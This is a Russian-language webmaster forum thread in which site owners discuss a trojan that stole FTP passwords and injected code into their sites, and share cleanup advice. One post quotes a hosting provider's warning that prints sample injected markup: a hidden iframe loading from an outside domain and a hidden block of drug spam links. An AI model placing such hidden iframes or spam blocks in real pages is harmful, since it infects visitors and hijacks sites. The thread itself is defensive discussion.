Опасная инъекция в сайты от mdfc.info - у меня заразились все 30 сайтов!

shamkovel
На сайте с 13.11.2005
Offline
38
#21
FView:
короче - у меня он 20 сайтов свалил - лечение каспером и меняйте пароли от фтп срочно - он пароли тибрит и к себе на какой то сервер кладет - а потом коннектится периодически и гадит ...

Последовательность такая:

  • удаляем файл длл с вирусами
  • замещаем вскрытый IE незараженным
  • меняем фтп пароли к сайтам
  • вычищаем сайты либо руками (все подпапки файлы типа index) либо, закачав домой, прогой типа dreamweaver.
  • меняем почтовые пароли!
  • думаем-гадаем, поменять-ли пароли к sql базам ...

И вот еще, что вспомнил. Скрипт вируса лезет не только во все папки сайта, но и во все папки выше !

Лицо, как зеркало души (http://shamkovel.ru/article/zerkalo_dushy)
FView
На сайте с 03.05.2006
Offline
186
#22

не обязательно что dll, не обязательно что IE заражает - это разновидности ... sql пароли не крадет

shamkovel
На сайте с 13.11.2005
Offline
38
#23
FView:
не обязательно что dll, не обязательно что IE заражает - это разновидности ... sql пароли не крадет

Скажите, зачем этот скрипт лезет в .htaccess ?

YngwieM
На сайте с 24.01.2007
Offline
33
#24

у человека был доступ к моему сайту... все блин... убили мне весь хостинг :)

справился! вроде бы не страшный зверь...

всем удачи!

GS
На сайте с 18.03.2007
Offline
43
#25

А Вы заметили, что, когда открыт броузер с этим трояном, в компе перестает работать буфер обмена?

Что это может значить?

Потом, нет никакой проги, чтобы делать замену кода страницы, нескачивая файлы на комп?

Т.к. есть очень объемные папки на сервере с тяжелыми файлами.

Не могут ли сами хостеры придумать какую либо защиту от таких троянов?

Сил нет уже терпеть это. Не работа, а сплошные перезакачки.

Семинары и тренинги для оптимизаторов (http://www.all-seminar.ru/)
Megavolt
На сайте с 23.12.2005
Offline
179
#26

блин, я угораю над вами. как можно пользоваться ИЕ? все равно что вместо входной двери занавеску поставить. и потом удивлятся, когда вернувшись из магазина что то вквартире не обнаружить.

Иногда лучше жевать.... (С)
nickspring
На сайте с 29.03.2006
Offline
228
#27
Megavolt:
блин, я угораю над вами. как можно пользоваться ИЕ? все равно что вместо входной двери занавеску поставить. и потом удивлятся, когда вернувшись из магазина что то вквартире не обнаружить.

тут угорать нечего, плакать надо, что такие продукты как аллсаб используют движок дырявого ослика (у нас он только в таком виде используется).

P.S. К слову, mdfc.info содержит как раз код, использующий уязвимость ие... т.е. пока iframe висел на сайте все посетители с IE подхватили ту же гадость.

[Удален]
#28
nickspring:
плакать надо, что такие продукты как аллсаб используют движок дырявого ослика

Это значит что "аллсаб" запрещает ставить оперу или лисичку и пользоваться ими ?

(у меня тоже есть IE для особых случаев но пользуюсь я Firefox)

Gera-Serega:
Не могут ли сами хостеры придумать какую либо защиту от таких троянов?

Ага, а штрафы за пьянство за рулём должны оплачивать производители презервативов :)

(в принципе равносильное по уровню здравого смысла предложение, больше людей пользовалось бы презервативами меньше рождалось бы людей, из них меньше было бы тех кто пьёт за рулём)

hlopec
На сайте с 25.10.2006
Offline
96
#29

Мой хостер давно предупредил меня об этом :p

Уважаемые абоненты!

Сообщаем, что в сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct

(возможны другия названия), распространяющий себя через веб-сайты.

Схема заражения довольно проста: достаточно зайти на зараженный

сайт и при стандартных настройках безопасности браузера, вирус

автоматически установится на компьютере пользователя.

После этого он начинает отслеживать логины и пароли от FTP,

высылая их злоумышленникам. Собрав определенное количество паролей,

запускается специальная программа, которая подключается по FTP

к каждому сайту и встраивает в начало или конец страниц собственный

html-код, например, такой:

<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0

src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->

или

<u style=display:none><a href="http://www.streetsmarts.us/projects/media/hydrocodone/buy-hydrocodone.html">buy hydrocodone</a>

<a href="http://www.streetsmarts.us/projects/media/hydrocodone/m367-hydrocodone.html">m367 hydrocodone</a></u>

Мы просим проверить свои сайты на предмет заражения. Для этого

достаточно проверить исходный код главной страницы на наличия постороннего текста.

В случае обнаружения следов вируса необходимо выполнить

следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.

2. Проверить локальный компьютер на наличие вирусов.

3. Зайти в панель управления хостинг-аккаунтом

и изменить пароль на пользователя FTP.

Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы,

где в качестве причин заражения указываются различные бесплатные "движки"

(phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров.

Со своей стороны можем заверить, что вирус распространяется только способом,

описанным в этом письме, и его появление не связано с проблемами безопасности

на сервере.

--

С уважением,

Олег Тягунов,

Служба технической поддержки Active Technologies

http://www.atservers.com/

__________ NOD32 2044 (20070207) Information __________

This message was checked by NOD32 antivirus system.

http://www.eset.com

[Удален]
#30

Вот что развили панику, я всегда когда пользую алсаб предварительно запрещаю IE :

Отладку и выполнение любых js файлов а также activex. + Постоянно в памяти компьютера лицензионные Drweb(обновляеться сам) и ZoneAlarm (стараюсь постоянно обновлять)+ в qip запрещена передача файлов. Вот и всё вроде бы нечего сложного но иногда бывает так лень потратить 200 уе в год на защиту от зелёных змеев, странные мы интернетчики люди пока гром не грянет мы неставим антивирусы, файрволы, недумаем о настройках ие когда проги вроде алсаба запускаем, что поделать сам таким был.Мой вам совет разоритесь на антивирусное ПО, поверьте нервы 100 раз дороже как и потерянное время🚬 .

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий